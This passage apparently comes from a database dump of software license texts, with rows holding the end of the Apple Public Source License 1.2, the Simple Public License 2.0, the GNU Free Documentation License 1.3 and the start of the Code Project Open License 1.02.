behalf\nand as Your sole responsibility, and not on behalf of Apple or any Contributor.\nYou must obtain the recipient\'s agreement that any such Additional Terms are\noffered by You alone, and You hereby agree to indemnify, defend and hold Apple\nand every Contributor harmless for any liability incurred by or claims asserted\nagainst Apple or such Contributor by reason of any such Additional Terms.\n\n7. Versions of the License. Apple may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Apple. No one other than Apple has the\nright to modify the terms applicable to Covered Code created under this License.\n\n8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Covered Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nCovered Code, or any portion thereof, is at Your sole and entire risk. THE\nCOVERED CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND APPLE AND APPLE\'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS\n\"APPLE\" FOR THE PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY\nDISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY,\nOF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR PURPOSE, OF ACCURACY,\nOF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. APPLE AND EACH\nCONTRIBUTOR DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT OF THE\nCOVERED CODE, THAT THE FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR\nREQUIREMENTS, THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED\nOR ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO ORAL\nOR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE AUTHORIZED REPRESENTATIVE\nOR ANY CONTRIBUTOR SHALL CREATE A WARRANTY. You acknowledge that the Covered\nCode is not intended for use in the operation of nuclear facilities, aircraft\nnavigation, communication systems, or air traffic control machines in which\ncase the failure of the Covered Code could lead to death, personal injury,\nor severe physical or environmental damage.\n\n9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT\nSHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL, SPECIAL, INDIRECT\nOR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING TO THIS LICENSE OR YOUR\nUSE OR INABILITY TO USE THE COVERED CODE, OR ANY PORTION THEREOF, WHETHER\nUNDER A THEORY OF CONTRACT, WARRANTY, TORT (INCLUDING NEGLIGENCE), PRODUCTS\nLIABILITY OR OTHERWISE, EVEN IF APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL\nPURPOSE OF ANY REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY\nOF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY TO\nYOU. In no event shall Apple\'s total liability to You for all damages (other\nthan as may be required by applicable law) under this License exceed the amount\nof fifty dollars ($50.00).\n\n10. Trademarks. This License does not grant any rights to use the trademarks\nor trade names \"Apple\", \"Apple Computer\", \"Mac OS X\", \"Mac OS X Server\", \"QuickTime\",\n\"QuickTime Streaming Server\" or any other trademarks or trade names belonging\nto Apple (collectively \"Apple Marks\") or to any trademark or trade name belonging\nto any Contributor. No Apple Marks may be used to endorse or promote products\nderived from the Original Code other than as permitted by and in strict compliance\nat all times with Apple\'s third party trademark usage guidelines which are\nposted at http://www.apple.com/legal/guidelinesfor3rdparties.html.\n\n11. Ownership. Subject to the licenses granted under this License, each Contributor\nretains all rights, title and interest in and to any Modifications made by\nsuch Contributor. Apple retains all rights, title and interest in and to the\nOriginal Code and any Modifications made by or on behalf of Apple (\"Apple\nModifications\"), and such Apple Modifications will not be automatically subject\nto this License. Apple may, at its sole discretion, choose to license such\nApple Modifications under this License, or on different terms from those contained\nin this License or may choose not to license them at all.\n\n 12. Termination.\n\n12.1 Termination. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice from Apple if You fail to comply with any\nterm(s) of this License and fail to cure such breach within 30 days of becoming\naware of such breach;\n\n(b) immediately in the event of the circumstances described in Section 13.5(b);\nor\n\n(c) automatically without notice from Apple if You, at any time during the\nterm of this License, commence an action for patent infringement against Apple.\n\n12.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification, sublicensing and distribution\nof the Covered Code and to destroy all copies of the Covered Code that are\nin your possession or control. All sublicenses to the Covered Code which have\nbeen properly granted prior to termination shall survive any termination of\nthis License. Provisions which, by their nature, should remain in effect beyond\nthe termination of this License shall survive, including but not limited to\nSections 3, 5, 8, 9, 10, 11, 12.2 and 13. No party will be liable to any other\nfor compensation, indemnity or damages of any sort solely as a result of terminating\nthis License in accordance with its terms, and termination of this License\nwill be without prejudice to any other right or remedy of any party.\n\n 13. Miscellaneous.\n\n13.1 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in accordance with FAR 12.211 (Technical Data) and 12.212 (Computer\nSoftware) and, for Department of Defense purchases, DFAR 252.227-7015 (Technical\nData -- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n13.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween or amongYou, Apple or any Contributor, and You will not represent\nto the contrary, whether expressly, by implication, appearance or otherwise.\n\n13.3 Independent Development. Nothing in this License will impair Apple\'s\nright to acquire, license, develop, have others develop for it, market and/or\ndistribute technology or products that perform the same or similar functions\nas, or otherwise compete with, Modifications, Larger Works, technology or\nproducts that You may develop, produce, market or distribute.\n\n13.4 Waiver; Construction. Failure by Apple or any Contributor to enforce\nany provision of this License will not be deemed a waiver of future enforcement\nof that or any other provision. Any law or regulation which provides that\nthe language of a contract shall be construed against the drafter will not\napply to this License.\n\n13.5 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n13.6 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Apple relating to this License shall take place in the Northern District\nof California, and You and Apple hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n13.7 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nCalifornia, except that body of California law concerning conflicts of law.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exigé que\nle présent contrat et tous les documents connexes soient rédigés en anglais.\nEXHIBIT A.\n\n\"Portions Copyright (c) 1999-2001 Apple Computer, Inc. All Rights Reserved.\n\nThis file contains Original Code and/or Modifications of Original Code as\ndefined in and that are subject to the Apple Public Source License Version\n1.2 (the \'License\'). You may not use this file except in compliance with the\nLicense. Please obtain a copy of the License at http://www.apple.com/publicsource\nand read it before using this file.\n\nThe Original Code and all software distributed under the License are distributed\non an \'AS IS\' basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nAND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION,\nANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET\nENJOYMENT OR NON-INFRINGEMENT. Please see the License for the specific language\ngoverning rights and limitations under the License.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(265,'SimPL-2.0','Simple Public License (SimPL) Preamble\n\nThis Simple Public License 2.0 (SimPL 2.0 for short) is a plain language implementation\nof GPL 2.0. The words are different, but the goal is the same - to guarantee\nfor all users the freedom to share and change software. If anyone wonders\nabout the meaning of the SimPL, they should interpret it as consistent with\nGPL 2.0. Simple Public License (SimPL) 2.0\n\nThe SimPL applies to the software\'s source and object code and comes with\nany rights that I have in it (other than trademarks). You agree to the SimPL\nby copying, distributing, or making a derivative work of the software.\n\nYou get the royalty free right to:\n\n - Use the software for any purpose;\n\n - Make derivative works of it (this is called a \"Derived Work\");\n\n - Copy and distribute it and any Derived Work.\n\nIf you distribute the software or a Derived Work, you must give back to the\ncommunity by:\n\n - Prominently noting the date of any changes you make;\n\n- Leaving other people\'s copyright notices, warranty disclaimers, and license\nterms in place;\n\n- Providing the source code, build scripts, installation scripts, and interface\ndefinitions in a form that is easy to get and best to modify;\n\n- Licensing it to everyone under SimPL, or substantially similar terms (such\nas GPL 2.0), without adding further restrictions to the rights provided;\n\n - Conspicuously announcing that it is available under that license.\n\nThere are some things that you must shoulder:\n\n - You get NO WARRANTIES. None of any kind;\n\n- If the software damages you in any way, you may only recover direct damages\nup to the amount you paid for it (that is zero if you did not pay anything).\nYou may not recover any other damages, including those called \"consequential\ndamages.\" (The state or country where you live may not allow you to limit\nyour liability in this way, so this may not apply to you);\n\nThe SimPL continues perpetually, except that your license rights end automatically\nif:\n\n- You do not abide by the \"give back to the community\" terms (your licensees\nget to keep their rights if they abide);\n\n- Anyone prevents you from distributing the software under the terms of the\nSimPL.\n\nLicense for the License\n\nYou may do anything that you want with the SimPL text; it\'s a license form\nto use in any way that you find helpful. To avoid confusion, however, if you\nchange the terms in any way then you may not call your license the Simple\nPublic License or the SimPL (but feel free to acknowledge that your license\nis \"based on the Simple Public License\").\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(266,'GFDL-1.3-only','GNU Free Documentation License\n\nVersion 1.3, 3 November 2008\n\nCopyright (C) 2000, 2001, 2002, 2007, 2008 Free Software Foundation, Inc.\n<http://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other functional\nand useful document \"free\" in the sense of freedom: to assure everyone the\neffective freedom to copy and redistribute it, with or without modifying it,\neither commercially or noncommercially. Secondarily, this License preserves\nfor the author and publisher a way to get credit for their work, while not\nbeing considered responsible for modifications made by others.\n\nThis License is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work, in any medium, that contains\na notice placed by the copyright holder saying it can be distributed under\nthe terms of this License. Such a notice grants a world-wide, royalty-free\nlicense, unlimited in duration, to use that work under the conditions stated\nherein. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\". You accept the license\nif you copy, modify or distribute the work in a way requiring permission under\ncopyright law.\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(Thus, if the Document is in part a textbook of mathematics, a Secondary Section\nmay not explain any mathematics.) The relationship could be a matter of historical\nconnection with the subject or with related matters, or of legal, commercial,\nphilosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License. If a section does not fit the above definition\nof Secondary then it is not allowed to be designated as Invariant. The Document\nmay contain zero Invariant Sections. If the Document does not identify any\nInvariant Sections then there are none.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License. A Front-Cover Text may be at most 5 words, and a Back-Cover\nText may be at most 25 words.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, that is\nsuitable for revising the document straightforwardly with generic text editors\nor (for images composed of pixels) generic paint programs or (for drawings)\nsome widely available drawing editor, and that is suitable for input to text\nformatters or for automatic translation to a variety of formats suitable for\ninput to text formatters. A copy made in an otherwise Transparent file format\nwhose markup, or absence of markup, has been arranged to thwart or discourage\nsubsequent modification by readers is not Transparent. An image format is\nnot Transparent if used for any substantial amount of text. A copy that is\nnot \"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML, PostScript or PDF designed\nfor human modification. Examples of transparent image formats include PNG,\nXCF and JPG. Opaque formats include proprietary formats that can be read and\nedited only by proprietary word processors, SGML or XML for which the DTD\nand/or processing tools are not generally available, and the machine-generated\nHTML, PostScript or PDF produced by some word processors for output purposes\nonly.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\nThe \"publisher\" means any person or entity that distributes copies of the\nDocument to the public.\n\nA section \"Entitled XYZ\" means a named subunit of the Document whose title\neither is precisely XYZ or contains XYZ in parentheses following text that\ntranslates XYZ in another language. (Here XYZ stands for a specific section\nname mentioned below, such as \"Acknowledgements\", \"Dedications\", \"Endorsements\",\nor \"History\".) To \"Preserve the Title\" of such a section when you modify the\nDocument means that it remains a section \"Entitled XYZ\" according to this\ndefinition.\n\nThe Document may include Warranty Disclaimers next to the notice which states\nthat this License applies to the Document. These Warranty Disclaimers are\nconsidered to be included by reference in this License, but only as regards\ndisclaiming warranties: any other implication that these Warranty Disclaimers\nmay have is void and has no effect on the meaning of this License.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies (or copies in media that commonly have printed\ncovers) of the Document, numbering more than 100, and the Document\'s license\nnotice requires Cover Texts, you must enclose the copies in covers that carry,\nclearly and legibly, all these Cover Texts: Front-Cover Texts on the front\ncover, and Back-Cover Texts on the back cover. Both covers must also clearly\nand legibly identify you as the publisher of these copies. The front cover\nmust present the full title with all words of the title equally prominent\nand visible. You may add other material on the covers in addition. Copying\nwith changes limited to the covers, as long as they preserve the title of\nthe Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a computer-network\nlocation from which the general network-using public has access to download\nusing public-standard network protocols a complete Transparent copy of the\nDocument, free of added material. If you use the latter option, you must take\nreasonably prudent steps, when you begin distribution of Opaque copies in\nquantity, to ensure that this Transparent copy will remain thus accessible\nat the stated location until at least one year after the last time you distribute\nan Opaque copy (directly or through your agents or retailers) of that edition\nto the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has fewer than five), unless they release you from this requirement.\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice. H. Include an\nunaltered copy of this License.\n\nI. Preserve the section Entitled \"History\", Preserve its Title, and add to\nit an item stating at least the title, year, new authors, and publisher of\nthe Modified Version as given on the Title Page. If there is no section Entitled\n\"History\" in the Document, create one stating the title, year, authors, and\npublisher of the Document as given on its Title Page, then add an item describing\nthe Modified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. For any section Entitled \"Acknowledgements\" or \"Dedications\", Preserve\nthe Title of the section, and preserve in the section all the substance and\ntone of each of the contributor acknowledgements and/or dedications given\ntherein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section Entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section to be Entitled \"Endorsements\" or to\nconflict in title with any Invariant Section.\n\n O. Preserve any Warranty Disclaimers.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section Entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice, and that you preserve all their\nWarranty Disclaimers.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections Entitled \"History\" in the\nvarious original documents, forming one section Entitled \"History\"; likewise\ncombine any sections Entitled \"Acknowledgements\", and any sections Entitled\n\"Dedications\". You must delete all sections Entitled \"Endorsements\".\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\nis called an \"aggregate\" if the copyright resulting from the compilation is\nnot used to limit the legal rights of the compilation\'s users beyond what\nthe individual works permit. When the Document is included in an aggregate,\nthis License does not apply to the other works in the aggregate which are\nnot themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one half of the entire aggregate,\nthe Document\'s Cover Texts may be placed on covers that bracket the Document\nwithin the aggregate, or the electronic equivalent of covers if the Document\nis in electronic form. Otherwise they must appear on printed covers that bracket\nthe whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License, and all the license notices in the Document, and any Warranty\nDisclaimers, provided that you also include the original English version of\nthis License and the original versions of those notices and disclaimers. In\ncase of a disagreement between the translation and the original version of\nthis License or a notice or disclaimer, the original version will prevail.\n\nIf a section in the Document is Entitled \"Acknowledgements\", \"Dedications\",\nor \"History\", the requirement (section 4) to Preserve its Title (section 1)\nwill typically require changing the actual title.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided under this License. Any attempt otherwise to copy, modify,\nsublicense, or distribute it is void, and will automatically terminate your\nrights under this License.\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, receipt\nof a copy of some or all of the same material does not give you any rights\nto use it.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nIf the Document specifies that a proxy can decide which future versions of\nthis License can be used, that proxy\'s public statement of acceptance of a\nversion permanently authorizes you to choose that version for the Document.\n\n 11. RELICENSING\n\n\"Massive Multiauthor Collaboration Site\" (or \"MMC Site\") means any World Wide\nWeb server that publishes copyrightable works and also provides prominent\nfacilities for anybody to edit those works. A public wiki that anybody can\nedit is an example of such a server. A \"Massive Multiauthor Collaboration\"\n(or \"MMC\") contained in the site means any set of copyrightable works thus\npublished on the MMC site.\n\n\"CC-BY-SA\" means the Creative Commons Attribution-Share Alike 3.0 license\npublished by Creative Commons Corporation, a not-for-profit corporation with\na principal place of business in San Francisco, California, as well as future\ncopyleft versions of that license published by that same organization.\n\n\"Incorporate\" means to publish or republish a Document, in whole or in part,\nas part of another Document.\n\nAn MMC is \"eligible for relicensing\" if it is licensed under this License,\nand if all works that were first published under this License somewhere other\nthan this MMC, and subsequently incorporated in whole or in part into the\nMMC, (1) had no cover texts or invariant sections, and (2) were thus incorporated\nprior to November 1, 2008.\n\nThe operator of an MMC Site may republish an MMC contained in the site under\nCC-BY-SA on the same site at any time before August 1, 2009, provided the\nMMC is eligible for relicensing. ADDENDUM: How to use this License for your\ndocuments\n\nTo use this License in a document you have written, include a copy of the\nLicense in the document and put the following copyright and license notices\njust after the title page:\n\nCopyright (c) YEAR YOUR NAME. Permission is granted to copy, distribute and/or\nmodify this document under the terms of the GNU Free Documentation License,\nVersion 1.3 or any later version published by the Free Software Foundation;\nwith no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.\nA copy of the license is included in the section entitled \"GNU Free Documentation\nLicense\".\n\nIf you have Invariant Sections, Front-Cover Texts and Back-Cover Texts, replace\nthe \"with...Texts.\" line with this:\n\nwith the Invariant Sections being LIST THEIR TITLES, with the Front-Cover\nTexts being LIST, and with the Back-Cover Texts being LIST.\n\nIf you have Invariant Sections without Cover Texts, or some other combination\nof the three, merge those two alternatives to suit the situation.\n\nIf your document contains nontrivial examples of program code, we recommend\nreleasing these examples in parallel under your choice of free software license,\nsuch as the GNU General Public License, to permit their use in free software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(267,'CPOL-1.02','The Code Project Open License (CPOL) 1.02\n\nPreamble\n\nThis License governs Your use of the Work. This License is intended to allow\ndevelopers to use the Source Code and Executable Files provided as part of\nthe Work in any application in any form.\n\nThe main points subject to the terms of the License are:\n\n - Source Code and Executable Files can be used in commercial applications;\n\n - Source Code and Executable Files can be redistributed; and\n\n - Source Code can be modified to create derivative works.\n\n- No claim of suitability, guarantee, or any warranty whatsoever is provided.\nThe software is provided \"as-is\".\n\n- The Article accompanying the Work may not be distributed or republished\nwithout the Author\'s consent\n\nThis License is entered between You, the individual or other entity reading\nor otherwise making use of the Work licensed pursuant to this License and\nthe individual or other entity which offers the Work under the terms of this\nLicense (\"Author\").\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CODE PROJECT\nOPEN LICENSE (\"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER\nAPPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE\nOR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HEREIN, YOU ACCEPT AND AGREE\nTO BE BOUND BY THE TERMS OF THIS LICENSE. THE AUTHOR GRANTS YOU THE RIGHTS\nCONTAINED HEREIN IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\nIF YOU DO NOT AGREE TO ACCEPT AND BE BOUND BY THE TERMS OF THIS LICENSE, YOU\nCANNOT MAKE ANY USE OF THE WORK.\n\n 1. Definitions.\n\na. \"Articles\" means, collectively, all articles written by Author which describes\nhow the Source Code and Executable Files for the Work may be used by a user.\n\nb. \"Author\" means the individual or entity that offers the Work under the\nterms of this License.\n\nc. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works.\n\nd. \"Executable Files\" refer to the executables, binary files, configuration\nand any required data files included in the Work.\n\ne. \"Publisher\" means the provider of the website, magazine, CD-ROM, DVD or\nother medium from or by which the Work is obtained by You.\n\nf. \"Source Code\" refers to the collection of source code and configuration\nfiles used to create the Executable Files.\n\ng. \"Standard Version\" refers to such a Work if it has not been modified, or\nhas been modified in accordance with the consent of the Author, such consent\nbeing in the full discretion of the Author.\n\nh. \"Work\" refers to the collection of files distributed by the Publisher,\nincluding the Source Code, Executable Files, binaries, data files, documentation,\nwhitepapers and the Articles.\n\ni. \"You\" is you, an individual or entity wishing to use the Work and exercise\nyour rights under this License.\n\n2. Fair Use/Fair Use Rights. Nothing in this License is intended to reduce,\nlimit, or restrict any rights arising from fair use, fair dealing, first sale\nor other limitations on the exclusive rights of the copyright owner under\ncopyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, the\nAuthor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual\n(for the duration of the applicable copyright) license to exercise the rights\nin the Work as stated below:\n\na. You may use the standard version of the Source Code or Executable Files\nin Your own applications.\n\nb. You may apply bug fixes, portability fixes and other modifications obtained\nfrom the Public Domain or from the Author. A Work modified in such a way shall\nstill be considered the standard version and will be subject to this License.\n\nc. You may otherwise modify Your copy of this Work (excluding the Articles)\nin any way to create a Derivative Work, provided that You insert a prominent\nnotice in each changed file stating how, when and where You changed that file.\n\nd. You may distribute the standard version of the Executable Files and Source\nCode or Derivative Work in aggregate with other (possibly commercial) programs\nas part of a larger (possibly commercial) software distribution.\n\ne. The Articles discussing the Work published in any form by the author may\nnot be distributed or republished without the Author\'s consent. The author\nretains copyright to any such Articles. You may use the Executable Files and\nSource Code pursuant to this License but you may not repost or republish or\notherwise distribute or make available the Articles, without the prior written\nconsent of the Author.\n\nAny subroutines or modules supplied by You and linked into the Source 